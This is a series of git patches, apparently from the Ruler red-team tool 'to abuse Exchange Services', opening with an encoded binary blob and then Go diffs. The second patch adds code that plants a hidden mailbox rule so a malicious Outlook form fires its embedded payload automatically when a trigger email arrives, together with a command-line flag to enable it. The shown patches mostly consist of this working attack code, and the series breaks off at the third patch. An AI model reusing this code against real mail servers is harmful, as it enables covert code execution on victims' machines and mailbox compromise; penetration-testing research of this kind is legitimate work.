zlN3oK!IL>{oLXd<EN@kMoiTOB$Ml#!#r+~unohWqmo;Za|Ge5Ww~GI8NuRtmIxVBN
z!|jp$iM8(}bX>acXuMT~X?J<u>B9y#eLBndh2!pe6Gk`N>b~dBjwU-d@0}qFw7K4J
z^1u@n4lai?8=f_onqdE-?TV2F6|;;JZAQI}T6f1|Fn>*(g^p{T4lgZDNV3TvYWMIm
zf9R8VUf#<SU2VrVzc%_=tK+FrOIp;jn!3g{L3VWc%ukb9K2xmk+giB3WjJZfv&^#i
z&o8B_t*!)AJRBx&Hn;EE9qrAtqUZNd&T8nia_p!S5C8t%O^uby@7J3mXjtJgpn@DU
zz{qOM>!*EAZ?NBx=VlRcVC9=jQKOqB4cV_hfBK1Im!G*VKIZ0d-F}JblLM*B1xXbW
z&W+M%_cJ(GI?Sl`ZvLQSsT;SrJ}bF2=EFkaHH(y~6~ABGoAMxVrG4EVonN1sy8Zs1
zc;iVgdQYrf_qvVuspH)jzMU{RzwwH8Pc+lEq&nU*xoq()u<4{krRA>o^D{lBnO$i+
zX0TnOyDQ_{w`@M;V&);$@moQ@s~+@7du=@b_t1nkkAkwg^RFE=t)1vNr|VUp6?>b{
z^$up<Gj}$ry>nZ};T1{YL35rhSbr^yaber0f=egInT8&D?ZsuZ%3R^oKo+&^TnK0T
z#@X-eoetP7^fxT%5;1_WG4OKh%bQQn+1Rt^)4GdX1LE$+%offH@|r#=ZbIXW?YgOa
z?j)uR5v{(E*T#4Gz3g)XOV(ZbJmXkaifQ`eYy8L|?c$y^ce~!>>ZI9CSHvG_aU_!0
z+`rGd7WTXMPwriI<Eqf+p{b;0^dj5AJL)mdOFNWwzsR=MYh%_r=*Ya&s&o9v)mBpn
zZ8aD#4nKL(yPv(Kd%)gBQJyXDEH6I4WyXnswQKXr*Z1qMX#etM_UhJ4y!Vc}_25d=
z;sMDf-c#OPTv4}dvN-cYpTL#w*5w{f7TfxM+U&9>=gA|DMPJj^cP97t-SMF9-i2$$
zt?xE%kv9Jrzw@9?P4zb9M3opDSzHZ!oo9K&`LSiYNt=gMq_%46-pe`E>%6exRhOsj
zW6tC!=nvoODVlS+znyR0#cML&hU~rEdiTK#dv}iUxzw6nHsE8&Ar*B^y;ts9d?wGf
zDRC<Q!jog`u6CYp;+b=8z~TvO-p^ZIx^qvo*I|zqb(d{?nSEpA#lyv!zbis!^;3Jj
z5?CaNnMYTea>m7mi0AcqTb|3lV*dKVGMjm(d;FeFJGPn8t*E1wX@&P8Vx;#;W^&GA
z^~tPgMefFTXOp)){BSp-kkjbe=5xMr9j&KN9sB<5Y7@nZ2cw_g^_xMA9y4V=QEG2G
zU~cTA$32GD3l)i`u6`;KHP>75GB5birPHtbwGQRD?Q>V$*l_oe_v(4WL&p!>S8Dcg
z;DHatX)_yK89rZMac=$H_Q%*KvgVCnCE9p@!_f5?UTru#uyA;n!3mLJch`^Z7{R#J
zcYiwh-EG^nBv-x*w(Dk)i|?qfzVm5y6)L6L=3S|~^r~~1+h9V)_zYu$IKS6?mhFwn
z#hWkaPx!;d)Rkuw^yI1OmX5~ulfn-!ir=^3x04o;jyE0RHdq>aJe)UT@u9>$PiFFi
z8}*)YwR2Q{*!Y=*+tY@zvwF7eWor}M*4|-ZvRRuRbCwoQ4S6Ts(rKlv-yha1*La`U
zR~%50HYV@+62|CbHU}ciM_ois=L;8;+dp-(oD$1nH5&3c$UEg~j$zvs$Iq0tTCyR~
z;MAbKdylH2VOouap=SpV*8E7B1+r@4JF2a)=a&q=*6#i+&4vD~rt5uO@M~@9&w@=s
zjjVnVzV807Ieo3V{K@Ik_c&3C%-1}=9t3~#D2Asys@JB5AtCH(2pSZAKEx0Wf!3d{
zylr2Pfu9<|!7w;loRDSQUD(SW?wpM_>J^=m0xF?iuwUh)F4~9WFey|W#Z+S8h3Zm8
z*{KBEJ0U@54zW-YKSqYR8Tk{*8R5xM-xl@{{jT^pD1>W{88EBF`x6OK(a97OA(4`5
zfDhCoF+lZY^%EeDZ6*VTVKBTpMvM~RQ476bcxtNdpK&%kl0hIgJVu-Ve^joKKcpnX
z;~C*_j6!<;C=}#ZaiB|JsszZ#uf(Y_;O@gfcQ=jk^O(8>{EimPz}ro*(`b;Y-l}}G
z0rlwnpqF>I?!LM(_?PB?eh=W8O%EIzSGH;we((zhh#q3Iwa*1Tfca(%X>2x5H%9AV
z8koT}YKzkV_yCN`=gXydZhkjNwT~Z3rPNbM_z0({pr8OSoFMQ*U`GVFM=1nHI0eA5
ze?yHuU_2_rcycugWAa1!?&=BC;6{_((myF=AK)jjYH=ta{UH7`ADNIJ$ZGLgVIRmp
z^J~Em9@X>B!pg!>wS2QOv$E>>z?WIQJglP-t<K+gGK6aNsa6v>g)#8ALphTq%k%-@
z+0k;~h~aG|<N~G!UL{^wEe{L+a-17em6IBLSw}i1R23n=(`S(T(F>@<&a;S}e+KoE
zPC|vxUZ9I_-l41SKcbTNpU{D~AJLAAk7)Vp4@mr=0=bFP(VG)HQSpovbbmr0v~PqE
z-7P9Wr{FHmDKFlk_?wT>qXX;Ehf9U%bzTa3vh6pt$;S+>ct@foFF&GDPhO+5DT7gI
zge@A`4&H>-r7P;yGXUjk-lCMpuTkusmq>K!KI)P+4oy8(j54-vM-g|Pqk-2oDERyz
zC_gg{%@Dexly1&wTG!TS_Uq4R?6Y?$;b8>|z4{adU4DdokE_vvjf>HQ=kHM9xyQ(T
za{+QXa0$tuzC_bse?;kz-=PTAb>zQj9rD~&ggBcEQQPQ5G_&*$iYhBdPK#EfX5;3g
zj-#ibj>A(?oq_Ra&eokM^yD>^^XLs~I$MDnO<jpBqEk`S%z0?-wOgpi;Y&z*`#EZ!
zoQ;N_Q6rZr3($sr```-wyDrdU?qB?G5B%E${{woUy-!a+2+ThC{ea&Kp8b722lVJ3
z8py;?oqrob`u1z=>f1vo3=Qn_Z7!tf_ZG0aVS=FG?-KZXnYLzi3+UdXN6*0Tity@U
z%Hw<c_;%{*hjqknLI+1jcMsc+Zk;=M;+MdD894Cng67Q~ot#}dy1I3OUFgeD&#Jk#
zwRLmr_8l78cC@qqCZBC-)x4R7m31qd){Si2wEZT(NmEOUdgjfVH>}&DWg}MOZ{?fA
zds*sRG^kytp^0gu@8sj^=ouN;u2aXPuBq9#<#9ekPfuUpz`)SZ;JfX|BtHs&TS);1
zQWi-T7y(r3DrK<K(fZ2I^b}W0C;6V{Zf>sC<lBPX_fKi=SZl}HJ7`YSKUSXbo{W!L
zed;gn(E5`nb#lUQGth=kpetrho9w1lM~x<9)v<z{HaVM0Fv8If<S6pP<Vh60gi652
zms$cUzXFaK6i;n|iVqnXp#R}O6{yI70@^sRs{GT&D<xFr8-10pRc>*jmcCXDR*vx>
z#ACt`#I;e#uN4ymFI$bl+Ax)G783*6F`%2`gtw?N4z*%x^Y2mlMj08}`kCE}F?)9J
z&+_P5S%z6P{<uA6&#KAC36%1!<&R@u*Z*hj`z9YMQyDP38bj5Lz^XTN^+$LOEc6N!
zzzELuKf`>(0C`%F0<MHYNXrHQ0pEZW(r`Xa`wgxXj5T*W^4S2ig<1gT-w#qm*+ej|
z;S2!&;N&k^sI)~^Wr@)i7;Sk~SzMKtme#_eEi2lhs%A-5T2Qp*^rgjwJGUIxvof&C
z%b>T)q5c@~h{TW!P(3V!2%U$^QaxOq;NSEA-91qJi!Xu4Gmr`}o3Mum$MH*Pw283j
z{~P{C^#FbWIQEj`YiIx%>pIxKZv=oH9JK+k9}wr$FM-16|Azk^J@8My1RVDW43!^-
z{Il8AOTb}oLItpX{6pcVFM*@w()b^eOSAc@e43EPc>a8@T1e^Czl{Hq{NPIY|2szU
zzpePIJ%9|jD8Sylt}hHf1HSf0QM?b}nY;pz5qN9dOL(*1Xd5`M4D8y66}_(&)%)ES
zelU!iv;*lGBQDMZg#haWov2SH;DlCReG;JY*s)g@#1++BQvfByWE)z4m0!KA%~yHC
zCHsUe#ue4u8LcgA`&B;Pv6|x=Ph$Lr5F6cvbEu8f3z8fGAV@=q0|!chP(Vd(C>q%1
zq+KB13BV9OY7s*Cq@|`3Nf#iFUny9f7Y|~X7qFK4`f7QRxXI{GUVMmo0@MOtzP^9*
zx?7D7svz|S8r*C8@WBjtUJ>49kV@4}fwyD$;KgeY0z0nM2Vz(zuAd&fyt9%vFgzkU
z0oSo9-m)v@W4`!G;-7#G5JOt|L;L|uC&JsgUR~<5953LWRtE6L91Y<8)gn8Pi0g;b
zK)w`r3Y_9rgoMWtiQ&PBO~v7$*PQwsM>C+nq#=a8z5Rg$2b`fE;h2YB1M1Tj5S8k|
zQm-w4;D8>||7A&R)Ddb#OTsPljnqvVt_8GE3Pn(}fXQvES_tV@kVe%GFkL&`s<zN-
z-0)$LUfIhYxK;geul%5#9*S{BXnQlDfPe{qEigc{(g%eL&)=_0;+Ko|iig+Wq!2Nw
zY`D!KF@^1D&!x^NYt}C@B04H6I*Kizh7VQ#mHRgQlF$E(;V<n!;s0C(|B`$$jLd&1
z{8T=zchLABl1sDsseGD{##sM2NUcVA#OhIcJ~eXTz(9-!VKC+)6i`RxUrP`1{~Xv2
zw5jkW*S7jv9yA@!z>5hTa2a|`>xB?MF5r*XX@te#qIj9Y!2qiA|43zEvHaUTgBL$K
ze9<$$zTfW|T;M;|Gyhm+=$>JGHD-(uqu|dmL!W)Wp>A}y0IuFMMwM&uk4tI02g|}N
zuz8AuftF3>HEZ})&G@h>(DnKAUD)53K`pXcrszy%z)|`}nID(Z)(p$S^z@MKiX&fz
zO8u)dBpdLx`WIFJ@NSTg>-o3zub=5q#bboN)pe@s`q!`OZrDq39oKjo*1v2h{RJ+C
z)E<(s{(=F9i_{;UyREK+VLb=aVO<E*@Bs|4P6Q7h^|z&UHLX4b-Uz8fB^_+LpgVy+
z1ay=#1Ug6%3!&d3ot6*lij<a(aV?Nf>wx}v(W$H_ro;SbT4SK2^*b-9Ty^~lzhWBe
zVs*aK+pwlkU2ns~8uP=nwZEgc{YKGi^+v3>VY>PN5WdyhD)m9!es>_id~tmlz!&!?
z-Tn)Zrfq*)s{b)x{0eMLkNejU=tBrCHKxs{`ruDmJPK)ABcS#5{gZYr?uSbKaa%S0
z(Fc+bG(u<wzV;Zv{Vc_56kflf$N$tH%^?$lo(<Ax@F(C?7HDRe9AAGNKLKkV=F=PA
z*Zd=m3+XkXZaBlbC%*O`aNV7tFKgD)Xf5~WwZ!$nBbC-xbuEE4NPPyP+J!Yv+%C+?
z4|Hpa#}72fzo&Vgt*&`i>lr*MaL@cqf5kQYo8d3%A8cym{Y}Z*;(tkg_&*|=V)B>d
z=l*m0=NCTrUv3tR%C=Alssk&d$Ir)0HG1Dj9q4~jq5ro1gY{pmIN*f~A7Ifk|4L)P
ziYXqg6iJmz@cq3XFNSo$^tAqKfal|ni+ru;VQUa9b4mj?{Hi*z)KWn^fv~QC1OL0~
zINmGhprwbs6)&1UCf8Pl7NXUuDz!Y|r0t>qx`j}^fBsHo{t-R6dS(9AgQ?->PaR>u
z|5^{meMNn3m6}Y{Xrf1z7E=ZPJ^Wwm0r>g=Rt*1g$kYZtM)sMRzs%>kWN^;gfnEG&
z8ugoFTz*jes|@I8j_fO4oxfWCXY_nz#KkKo{UK*QGX5g2k1Ck-%IXaMVtw?AisLjN
z_=r$TaEah^Jl^q^-xBo7FXMV&#7$s7!iE7gKd3T|zlgVlPb%YlxWSF$X9Ay3#&J66
z!vh-C<0kMK<?3;L_(V?i_>Vq9r2PmNKK}e8MDT1qVgqO=H(iq-V|<b6L07YUojwA`
zz!pm@0A1x1K#Q#{9BPv9K(+nn?Z<CLz&ez!@{@p8H~IKO;6Inosg$j&`~;v60KlQ9
z_H*IsH67$rZD|3#bd^6GXmxA<f94}#*uSsa_|yF(bhzy}0PCNIc%aZlKECog^#3p0
zA8{Zbk5?ROy8aG2egw@5__P7gwf(U`tIPH00+kN!r#vCnzaT#bX!!s*)YN|Mhv<Gf
z|EP9T7hlKg9}RMKX}<%sOo#UW^7W4b`D_3jYHGg&>}R^jw*fvK0d&3okwB~4_;=Mw
zK9-Arsnu0}1kmyUaHy&M_~XO6v>(f*gO+Q}$8gAISCZ5$U#E`{qV~WGTY9(-m27K7
zVUVla{MTvzG1>t?aB}G^Uj(#l032#+zXQ_gBe)2Am{|b2wtpzlvH@_YS-wvDAHx;+
zI05J?e+bYv0l=YV`S>HS|NQzh806}*{@@RR>L8ziJ>9tNIN&z@EDQny-Q?@`5oWDq
z?eS-_aXx<NMwju=)p7jcUnKB)rfd5L=qTR-EC?O?zpC$bmEXUzzJO{Re_ZM#^gkVc
z4EzfNeGM?rpM_8$(53$!bdz5tTi5pY1NpkmKb`cyUzXn&<eOJ^Qcd%pOMQg*r~UuS
z@<ViNKUc^7zXR}V4WMiP;|J1o+5fr!A^j&<XZbqmAHUrHK_H*L{&4!Y13mY2?f>cm
zTf!W}{s0Dm);}Sx7C$<|1ToC2`wR4u5fwMCWTM9~;o^MU9(}}YX@VM2am)_~eRPwD
z^X0v%D8!#r@!FLPTB7$<Tw5N~Gm^fPhon@TO_yg-@is&Bs08qrX!Et%P+tFwIQU<v
zIQEm{_L(5VFY--LtuNxxzOUlOblen+&|}or##>^3JuUSZb*Q)vG(aCsgt!S6X9KN1
zN`-h`Djo$LqL2I<=`l>HxFrziBV%(t29t{8kJ9VIkB52;b1IHM60eW=mMxJN!tJN8
zj|pN?{ZIEVRKpzS8&LA7`cd(T6#qdj^%%FKaef0TzcbY54i#@$8E=VNRP#R_9RbO|
z6k6oq-*~;zEDA^eQdvw~e;mF&f`fvn@|_Wj!oEmM;ZQV(!Vzd2g;T%b??{!mLlzX~
zqUIDGALUXw5=G0<Jrfj%wo~!6Z_0O|%C$u{RDO4=pX+LW#Qlc$dkJl*@@?R^a(n~I
z#P5;RnAVyqZ;K95^2ebv3NNd%O!dr$RCycZOksOuNtG9%trQ-CcKY3(VuB`BFY?8?
zB~`8!a;I=d)R-#AL#`ASqV5##hfJ3)HMBqrz9@?$?WuCsD3hWagqBb^9!;LMcaI^w
z!DufPAN5T+I-wm^-U_)>bb)BV9-)B=ibV&g_*isIaq0*Y&85k|!5yjcY@|ogd!nus
z4nY$sJOu5qzCakF;b;#P&qDqiqH;{olqx>Wsq!q;kjnQ*&J^x})=`*1rztE$?fyvE
zXn~fZAuhy2L$t1{d{e4?bJU5#9Z(~RzDrg9&rX_A<(i=eR5?H7M&TfIio!F0RvZ~o
z<(nc~3cI7}RJkxzMB&_@maj*ZYlMUpy$5PZVIQ=U!s)2?Wc=dP6+h%-PL*$n>QVGy
zuTZ!*!mpuegqHuX9GziEmA61P6mE%TQsu+ZatbG+8w2in7{Vvcoj<Hq8p6#`1ys5e
z`8R&##6)w@5h`wu45;!AP%8>|LgT3P0Vt2c38-_gYxag{JuS8hAExq|$eJqG8tGHm
z4N0kVtSQ$VEGRk?)RHRaiWX4uD71^h8R#U1XQ1X&@g6x3`7Jq<WQbN*F>OZW*FlY_
z@{Y)ZiuXct3X9P}3QN$#@U`tsP&SIp>)Fr{twc^0Nox$zD#WDnYa?$8n<71mPkm%X
zVP_OZrF)@l3J*qmx(4j9KufCR`%vk|h)K~mMiZ#G2py;JRCKO&;HriQZs__!XhP8$
zAti;)kTJ!l32IDX2egz*ABLuHj%sCr=6}P*jLL`mvMBm`h)rQj#HZ2&(0B?DL`RqP
zbTC0MsJ;rdsC+|In=01=xly=1YD%SdL!BrbjP_G_G&+_0?5qV^T*W1XN;g0)sB%uo
zg^Kq?^C=vIPEdF{DxT6)$wae}=aza4Ezm;rm`cw>T|}0B4bhq^e!qIcp!nz`HihdV
z4ponK$d`)uK{*s2idIoL2^CU!T9p`mDz1n8DBKtQPT`Sg)ZDEPP0)DIA@IJGgRW5N
zvrxpQ52q~9qN?)dR60Vz6lNe6CEo?@rsA2XYi#%1hDeS!sSMH$(b}qV^a-}3BH@j7
zN$|eAXzFMOXIb!8ylD8P>f5|Xc(+|R%;yxy69dEnbt;^BfDXWc)JRB)Mu`-SJ>Ymq
zNe2EY05L#mPf1Gz+GvzXQHO)nScq}ZFq8)8!z;_jgQP?#l@9R~C>ahhF}zpr@5m%T
zLMrej;BPoc6hm#}fjd6pTKp*o-#F0+g#d_9caZwe%1r^uxDGMj$n61gGr=2|2z9ah
zrjP8POfu9H_gOp|2^cOnj1mMZ3!=0hxa^b`gEa;`+we{aOBcc;ZaTmW0K6;Vd&u$b
zG7Dffz#IU)OV0zqvm9#*3jy#*!?O*qI7<QWN`kc;IY1u3asa%$tOQsEfcfItghv`a
z|2O<+dmt6Y0iL~fFc$FGj)Rd(z~~95Mi%}J``5<PxBT#Ihj)$sWj;|b-^5VA6d27(
zP&@oyOzo^rhO>Ao1<!mu_u{D;5ec=Y>yhxc<zk6=ZHuIiQGn?c>|1Fm2x|<#GXLm$
z+Ce+C?TmriCs3`$b36swglX_9#s=Qr&==y$9>8>6shZ(6NP8XeZvj7}=>-z-Dwzzl
zZFQgz0p5u~Zw<8l;Vc39K^s${e0Wu_gur<UaK+ae^ZXHAFW`gwlU^@zeSbvj4Sf;?
zQt<kXuRi8&Qv<yaMlT-An6f51zsm8AdzoDWzrG+F)6~=+UrHk0UGVrwp<a&}3N?tR
z?4#b0k6VjZ>gwYXx1|9<R}_qTp+G7Zk8j*g?4JV56#$QWH{k6Cf6l;z3u)RESBTlc
zZvzfM$Az;_;HwLV-m-(38{|a*eJA++O8X0<JH%m+|AKEg<T}9JAXri~RT4{ahcr7V
z<qE%OxWE~f?E;i`6n|%`om@D&K$!@jcKU{I1aQQ^9OK+5s%|cDj-_F~m~%LsxdR7R
zNVfxO7pN(w$8*aaD55CtU)MJZXfQ`yTP}bdv=WzaqWEGzxwgJBzzz3<mJ{aY4Cjti
zJOZe{<{Ja`;DYo{RNLIB8aV-fE#GJ;jcbm1YWo+bM1!;#IO2YAhqD;yCGFV!^SWtg
zDb|CMVFYBM-aw6KQ3~ZN>j`IB@GfAyA4fsjUkzXDZ?ry0>y@;AOY6zBzD?`xRr)`r
z@6|@MJwn?xv|dWv7qp&#n4)J^*<ZB&PTL=}T}RtxRdymM9L8W7()I>zFBnnjO{?^O
z+AgN;Yg)gj?L^vcr|o~*k3jn)Xuk&SAEE6#+TYTKlGg^&{vTTJrtJsXo~QjHw4aIg
zv(SDk+V4c$JG31~+Y?rl9Oo*%nzj>ZJCn9oY5SeF!-J^)?Of&82&3X&RsIFqPec2=
zXg?fnztes++AgR43$&kuwvYG}-+(IrmopXbQDq0wei_;>rR{s#&qVu)Xukz*Z_)M(
z?T?}D6WX67rsRZH+1cZ$_<$;VFO!N7s<K-rQt=^G_7H8S(*6$GZ$SGCb1C}BDtmku
z6_2j6>+pQTekOeH7WNO)ek<Bu^@McnH_D^RB~<w%R#EY!D*q5|r*EawN1%MFTrz6H
zz~xh_{Fb!;k@l<5{sG#~+C!Dks<Pi`zZq?};up4I{|D_Cqx}K}R5@vt|1cNmu-#Wi
z;cNs5?7s<Bb|CGiY^#UqCZRkEPe$foC}O|Zaf;v6Dm#<5e`!Ak?U$ncVnq~vZk2tR
z0DQ2WjGu47{+R*_&#m%*Jb^g&12izecmd*5cp(x~coAAi;l-$c!b{K}6kdwV4e`Tz
zzg781Jt2<mQrZru{Y|vLDul{ki8fJq6~Zs^!+w{+6kdaNP<Sn>YlPF+A!iDI>mP#d
zt1%d}ff0lP>WKXHzlu-PhYp5NKpm04kr}GjZ09Au!s^tzq1Uz+TgYB`zshdly?Vm4
z(t*QGNd8yljpw&&H6+fl+tR*)^G^4k>GZDU)b)JQq+8zQUSo=eMMao=MXwd3`|<w(
D8;50z

literal 0
HcmV?d00001

diff --git a/utils/utils.go b/utils/utils.go
index 62619ca..5979db2 100644
--- a/utils/utils.go
+++ b/utils/utils.go
@@ -214,9 +214,9 @@ func ReadByte(pos int, buff []byte) (byte, int) {
 func ReadUnicodeString(pos int, buff []byte) ([]byte, int) {
 	//stupid hack as using bufio and ReadString(byte) would terminate too early
 	//would terminate on 0x00 instead of 0x0000
-	index := bytes.Index(buff[pos:], []byte{0x00, 0x00, 0x00})
+	index := bytes.Index(buff[pos:], []byte{0x00, 0x00, 0x00}) + 1
 	str := buff[pos : pos+index]
-	return []byte(str), pos + index + 2
+	return []byte(str), pos + index + 1
 }
 
 //ReadASCIIString returns a string as ascii

From 3c35cd69d4339587f6953ef16b8e974c415e6f79 Mon Sep 17 00:00:00 2001
From: Etienne Stalmans <etienne@sensepost.com>
Date: Wed, 3 May 2017 15:51:04 +0100
Subject: [PATCH 2/4] Implement @monoxgas techinique for autotrigger of form.
 This creates a rule to autodelete the form message as it hits the inbox.
 Which triggers the embedded payload

---
 forms/rulerforms.go |  2 +-
 mapi/mapi.go        | 61 ++++++++++++++++++++++++++++++++++++++++++---
 ruler.go            | 18 +++++++++++++
 utils/utils.go      | 13 ++++++++++
 4 files changed, 90 insertions(+), 4 deletions(-)

diff --git a/forms/rulerforms.go b/forms/rulerforms.go
index 174a6e4..4492c11 100644
--- a/forms/rulerforms.go
+++ b/forms/rulerforms.go
@@ -186,7 +186,7 @@ func CreateFormTriggerMessage(suffix, subject, body string) ([]byte, error) {
 //DeleteForm is used to delete a specific form stored in an associated table
 func DeleteForm(suffix string, folderid []byte) ([]byte, error) {
 
-	columns := make([]mapi.PropertyTag, 2)
+	columns := make([]mapi.PropertyTag, 1)
 	columns[0] = mapi.PidTagOfflineAddressBookName
 	columns[1] = mapi.PidTagMid
 
diff --git a/mapi/mapi.go b/mapi/mapi.go
index da5162a..2c7242c 100644
--- a/mapi/mapi.go
+++ b/mapi/mapi.go
@@ -2041,7 +2041,7 @@ func GetTableContents(folderid []byte, assoc bool, columns []PropertyTag) (*RopQ
 
 	setColumns := RopSetColumnsRequest{RopID: 0x12, LogonID: AuthSession.LogonID, SetColumnFlags: 0x00}
 	setColumns.InputHandle = 0x01
-	setColumns.PropertyTagCount = uint16(len(columns))
+	setColumns.PropertyTagCount = 2 //uint16(len(columns))
 	setColumns.PropertyTags = make([]PropertyTag, setColumns.PropertyTagCount)
 	for k, v := range columns {
 		setColumns.PropertyTags[k] = v
@@ -2068,18 +2068,19 @@ func GetTableContents(folderid []byte, assoc bool, columns []PropertyTag) (*RopQ
 		bufPtr := 10
 		var p int
 		var e error
-
+		utils.Info.Println(execResponse)
 		setColumnsResp := RopSetColumnsResponse{}
 		if p, e = setColumnsResp.Unmarshal(execResponse.RopBuffer[bufPtr:]); e != nil {
 			return nil, e
 		}
 		bufPtr += p
-
+		utils.Info.Println("Display")
 		rows := RopQueryRowsResponse{}
 
 		if _, e = rows.Unmarshal(execResponse.RopBuffer[bufPtr:], setColumns.PropertyTags); e != nil {
 			return nil, e
 		}
+		utils.Info.Println("Display")
 		return &rows, nil
 	}
 
@@ -2126,6 +2127,60 @@ func DisplayRules() ([]Rule, error) {
 	//return nil, ErrUnknown
 }
 
+//ExecuteDeleteRuleAdd adds a new mailrule for deleting a message
+//This should be merged with ExecuteMailRuleAdd
+func ExecuteDeleteRuleAdd(rulename, triggerword string) (*ExecuteResponse, error) {
+	execRequest := ExecuteRequest{}
+	execRequest.Init()
+	execRequest.MaxRopOut = 262144
+
+	addRule := RopModifyRulesRequest{RopID: 0x41, LoginID: AuthSession.LogonID, InputHandleIndex: 0x00, ModifyRulesFlag: 0x00, RulesCount: 0x01, RuleData: RuleData{RuleDataFlags: 0x01}}
+
+	propertyValues := make([]TaggedPropertyValue, 8)
+	//RUle Name
+	propertyValues[0] = TaggedPropertyValue{PidTagRuleName, utils.UniString(rulename)}                                                                                                                                         //PidTagRuleSequence
+	propertyValues[1] = TaggedPropertyValue{PidTagRuleSequence, []byte{0x0A, 0x00, 0x00, 0x00}}                                                                                                                                //PidTagRuleState (Enabled)
+	propertyValues[2] = TaggedPropertyValue{PidTagRuleState, []byte{0x01, 0x00, 0x00, 0x00}}                                                                                                                                   //PidTagRuleCondition
+	propertyValues[3] = TaggedPropertyValue{PidTagRuleCondition, utils.BodyToBytes(RuleCondition{0x03, []byte{0x01, 0x00, 0x01, 0x00}, []byte{0x1F, 0x00, 0x37, 0x00, 0x1f, 0x00, 0x37, 0x00}, utils.UniString(triggerword)})} //PidTagRuleActions
+
+	actionData := ActionData{}
+	actionData.ActionElem = []byte{0x00, 0x00, 0x14}
+	actionData.ActionName = utils.UTF16BE(rulename, 1)
+	actionData.Element = []byte{0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x5F, 0x00, 0x00, 0x00, 0x05, 0x00, 0xff, 0xff, 0x00, 0x00, 0x0c, 0x00, 0x43, 0x52, 0x75, 0x6c, 0x65, 0x45, 0x6c, 0x65, 0x6d, 0x65, 0x6e, 0x74, 0x90, 0x01, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x80, 0x64, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x80, 0xCD, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00}
+	actionData.Triggger = utils.UTF16BE(triggerword, 1)
+	actionData.Elem = []byte{0x80, 0x4A, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x80, 0x42, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00}
+	actionData.EndPoint = []byte{}
+
+	ruleAction := RuleAction{Actions: 1, ActionType: 0x05, ActionFlavor: 0, ActionFlags: 0}
+	ruleAction.ActionLen = uint16(len(utils.BodyToBytes(actionData)) + 9)
+	ruleAction.ActionData = actionData
+
+	pdat := ruleAction.Marshal()
+
+	propertyValues[4] = TaggedPropertyValue{PidTagRuleActions, pdat}                              //PidTagRuleProvider
+	propertyValues[5] = TaggedPropertyValue{PidTagRuleProvider, utils.UniString("RuleOrganizer")} //PidTagRuleLevel
+	propertyValues[6] = TaggedPropertyValue{PidTagRuleLevel, []byte{0x00, 0x00, 0x00, 0x00}}      //PidTagRuleProviderData
+	propertyValues[7] = TaggedPropertyValue{PidTagRuleProviderData, []byte{0x10, 0x00, 0x00, 0x00, 0x14, 0x00, 0x01, 0x00, 0x00, 0x00, 0x28, 0x7d, 0xd2, 0x27, 0x14, 0xc4, 0xe4, 0x40}}
+	//propertyValues[8] = TaggedPropertyValue{PidTagRuleUserFlags, []byte{0x0, 0x0, 0x0, 0xf}} //PidTagRuleSequence
+
+	addRule.RuleData.PropertyValues = propertyValues
+	addRule.RuleData.PropertyValueCount = uint16(len(propertyValues))
+
+	ruleBytes := utils.BodyToBytes(addRule)
+	execRequest.RopBuffer.ROP.RopsList = ruleBytes
+	execRequest.RopBuffer.ROP.ServerObjectHandleTable = []byte{0x01, 0x00, 0x00, AuthSession.LogonID} //append(AuthSession.RulesHandle, []byte{0xFF, 0xFF, 0xFF, 0xFF}...)
+
+	execResponse, err := sendMapiRequest(execRequest)
+
+	if err != nil {
+		return nil, &TransportError{err}
+	}
+	utils.Trace.Println(execResponse)
+	return nil, err
+
+	//return nil, ErrUnknown
+}
+
 //ExecuteMailRuleAdd adds a new mailrules
 func ExecuteMailRuleAdd(rulename, triggerword, triggerlocation string, delete bool) (*ExecuteResponse, error) {
 	//valid
diff --git a/ruler.go b/ruler.go
index 5cf2fc1..fe6a35c 100644
--- a/ruler.go
+++ b/ruler.go
@@ -508,6 +508,20 @@ func createForm(c *cli.Context) error {
 	if err := forms.CreateFormAttachmentTemplate(folderid, msgid, command); err != nil {
 		return err
 	}
+	utils.Info.Println("Form created successfully")
+
+	if c.Bool("rule") == true {
+		rname := utils.GenerateString(6)
+		utils.Info.Printf("Rule trigger set. Adding new rule with name %s\n", rname)
+		triggerword := strings.Split(c.String("subject"), " ")[0]
+		utils.Info.Printf("Adding new rule with trigger of %s\n", triggerword)
+		//create delete rule
+		if _, err := mapi.ExecuteDeleteRuleAdd(rname, triggerword); err != nil {
+			utils.Error.Println("Failed to create the trigger rule")
+		} else {
+			utils.Info.Println("Trigger rule created.")
+		}
+	}
 
 	//trigger the email if the send option is enabled
 	if c.Bool("send") == true {
@@ -919,6 +933,10 @@ A tool by @_staaldraad from @sensepost to abuse Exchange Services.`
 							Name:  "send,s",
 							Usage: "Trigger the form once it's been created.",
 						},
+						cli.BoolFlag{
+							Name:  "rule,r",
+							Usage: "Trigger the form with a rule. This will add a new rule!",
+						},
 						cli.StringFlag{
 							Name:  "body,b",
 							Value: "This message cannot be displayed in the previewer.\n\n\n\n\n",
diff --git a/utils/utils.go b/utils/utils.go
index 5979db2..24ef37d 100644
--- a/utils/utils.go
+++ b/utils/utils.go
@@ -262,3 +262,16 @@ func Obfuscate(data []byte) []byte {
 	}
 	return bnew
 }
+
+//GenerateString creates a random string of lenght pcount
+func GenerateString(pcount int) string {
+	var letterRunes = []rune("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789")
+	//seed := time.Date(year, month, day, hour, min, sec,x,time.UTC).UnixNano()
+	rand.Seed(time.Now().UTC().UnixNano())
+
+	b := make([]rune, pcount)
+	for i := range b {
+		b[i] = letterRunes[rand.Intn(len(letterRunes))]
+	}
+	return string(b)
+}

From a1957616b6941e0eff4c409c41b6406ed368b565 Mon Sep 17 00:00:00 2001
From: Etienne Stalmans <etienne@sensepost.com>
Date: Wed, 3 May 2017 16:02:02 +0100
Subject: [PATCH 3/4] update the rule trigger so that it uses a random word. We
 don't want to delete innocent emails

---
 ruler.go | 6 +++++-
 1 file changed, 5 insertions(+), 1 deletion(-)

diff --git a/ruler.go b/ruler.go
